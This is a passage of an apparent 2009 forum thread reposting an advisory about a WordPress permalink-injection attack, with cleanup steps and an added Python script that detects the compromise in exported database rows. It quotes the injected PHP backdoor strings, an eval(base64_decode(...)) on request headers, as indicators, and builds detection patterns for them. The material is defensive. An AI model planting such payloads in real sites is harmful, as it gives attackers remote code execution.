  [Announcement]   WordPress SQL Injection – Latest Attack 07/09/2009 02:37:21 (+0700) | #1 | 191992
holiganvn
Member

Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
http://www.wpbeginner.com/news/wordpress-sql-injection-latest-attack/

A lot of sites are being hit by a recent SQL attack where code is being injected into your site. This MySQL injection affects your permalinks by making them ineffective. As a result, your blog post URLs will not work. Numerous WordPress blogs were targeted in this attack. Thanks to Andy Soward for bringing this to our attention.

One of the following codes was added to your permalink structure by this attack:
Code:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

Code:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECcode%5D))%7D%7D|.+)&%

These are appended to all permalinks on your site and can only be changed by removing them manually.

To fix this go to:

Settings > Permalinks and remove the above code and replace your default code.

Next thing you need to do is go to Users. You will see that there is more than one administrator. You won’t see their name listed, but you will see the count increased. So what you need to do is look at all users and find the last one who registered. Put your mouse over that user and get the link. Change the code userid= by adding 1 to that number. So if the last user you can see was user #2, then add 1 to it and make it 3. You should find the hidden admin has a weird code as a first name. Delete the code and make him a subscriber. Then return and delete him.

This should fix the problem. You can also delete him by simply going to your phpMyAdmin, because you will see the user there.

We just wanted to get this news out as soon as we could, so our users can be updated. Please make sure that you check that your blog is not infected. We hope that WordPress comes out with a release soon.

Also, if you haven’t implemented some of these measures to secure your http://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/
HaCk t0 LeArN,N0t LeArN t0 HaCk
  [Announcement]   WordPress SQL Injection – Latest Attack 09/09/2009 06:14:48 (+0700) | #2 | 192152
holiganvn
Member

Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
Everyone running a WordPress version earlier than 2.8.4 is affected by this security flaw. Upgrade your version right now.

If your permalink structure contains one of the strings below, you have most likely been attacked:

Code:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

Code:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECcode%5D))%7D%7D|.+)&%


Another way to tell is that there are some unfamiliar members on your blog. For example, you are the only administrator, but the dashboard shows Administrator (2).

To fix it, you need to find and delete the suspicious members, search for posts containing the string “eval”, and find and manually repair the URLs that the virus modified.

This security hole was discovered early and fixed in version 2.8.4 (released on 12/8).
HaCk t0 LeArN,N0t LeArN t0 HaCk
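Posts #1 and #2 above describe the same three indicators: the eval/base64_decode payload in the permalink structure (in plain or URL-encoded form), an administrator count that is higher than the visible user list, and posts containing “eval”. The script below is an added example for checking those indicators offline; it is not code from wpbeginner, HVA or the WordPress project. It assumes you have exported the relevant rows of wp_options, wp_users (with the role from wp_usermeta) and wp_posts, for instance via phpMyAdmin, into Python lists, and the sample rows embedded here are constructed for illustration. The fallback permalink structure “/%postname%/” is an assumption; substitute whatever your site used before the compromise.

```python
"""Offline triage for the 2009 WordPress permalink-injection compromise.

Added example, not code from wpbeginner or WordPress. Input is assumed to be
rows exported from wp_options, wp_users(+wp_usermeta role) and wp_posts.
"""
import re
from urllib.parse import unquote

# The injected permalink wraps eval(base64_decode(<request header>)) in %&( ... )&%.
# Matching on the URL-decoded text catches both samples quoted in the posts.
PAYLOAD_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
# Name fields should never carry markup or PHP superglobals; anything like this is suspect.
MARKUP_RE = re.compile(r"<[a-z/!?]|\$_SERVER|base64_decode", re.IGNORECASE)


def permalink_is_injected(permalink_structure: str) -> bool:
    """True if the permalink_structure option carries the eval/base64 payload."""
    return PAYLOAD_RE.search(unquote(permalink_structure)) is not None


def clean_permalink(permalink_structure: str, default: str = "/%postname%/") -> str:
    """Strip the %&( ... )&% wrapper the posts show; fall back to `default`
    (an assumption) when nothing usable remains."""
    decoded = unquote(permalink_structure)
    cleaned = re.sub(r"%&\(.*?\)&%", "", decoded)
    cleaned = cleaned.strip(' "\u201c\u201d')  # stray straight/curly quotes from the sample
    return cleaned if cleaned.strip("/") else default


def extra_admins(users: list, expected_admins: int = 1) -> list:
    """IDs of administrators beyond the number you know you created (lowest IDs
    are assumed to be the legitimate ones, matching the 'last registered' advice)."""
    admins = sorted((u for u in users if u["role"] == "administrator"), key=lambda u: u["ID"])
    return [u["ID"] for u in admins[expected_admins:]]


def tainted_users(users: list) -> list:
    """IDs of users whose login/first name/display name contain code or markup."""
    return [
        u["ID"] for u in users
        if MARKUP_RE.search(u.get("user_login", "") + u.get("first_name", "") + u.get("display_name", ""))
    ]


def posts_with_payload(posts: list) -> list:
    """IDs of posts whose content contains the eval/base64_decode pattern."""
    return [p["ID"] for p in posts if PAYLOAD_RE.search(p["post_content"])]


def audit(options: dict, users: list, posts: list, expected_admins: int = 1) -> dict:
    """Run all checks and return a findings dictionary."""
    structure = options.get("permalink_structure", "")
    return {
        "permalink_injected": permalink_is_injected(structure),
        "permalink_cleaned": clean_permalink(structure),
        "extra_admins": extra_admins(users, expected_admins),
        "tainted_users": tainted_users(users),
        "tainted_posts": posts_with_payload(posts),
    }


# Constructed sample rows: the permalink is the URL-encoded sample from the posts,
# user 3 is a hidden admin whose first name holds the payload, post 11 carries it in a comment.
SAMPLE_OPTIONS = {
    "permalink_structure": "/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECcode%5D))%7D%7D|.+)&%"
}
SAMPLE_USERS = [
    {"ID": 1, "user_login": "admin", "first_name": "Site", "display_name": "Site Owner", "role": "administrator"},
    {"ID": 2, "user_login": "editor1", "first_name": "Ed", "display_name": "Ed", "role": "editor"},
    {"ID": 3, "user_login": "wp_updater", "first_name": "eval(base64_decode($_SERVER[HTTP_REFERER]))",
     "display_name": "", "role": "administrator"},
]
SAMPLE_POSTS = [
    {"ID": 10, "post_content": "<p>Hello world</p>"},
    {"ID": 11, "post_content": "<p>Notes</p><!-- eval(base64_decode('...')) -->"},
]

if __name__ == "__main__":
    for key, value in audit(SAMPLE_OPTIONS, SAMPLE_USERS, SAMPLE_POSTS).items():
        print(f"{key}: {value}")
```

Run it against your own exported rows with `expected_admins` set to the number of administrators you actually created; any ID reported under `extra_admins` or `tainted_users` is the account to demote and delete, and `permalink_cleaned` is the value to put back under Settings > Permalinks.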
  [Announcement]   WordPress SQL Injection – Latest Attack 10/09/2009 15:21:11 (+0700) | #3 | 192268
kimprinceat
Member

Joined: 12/04/2003 07:47:56
Messages: 3
Offline
Not sure whether there are any others still affected. Going to search and test. Thanks.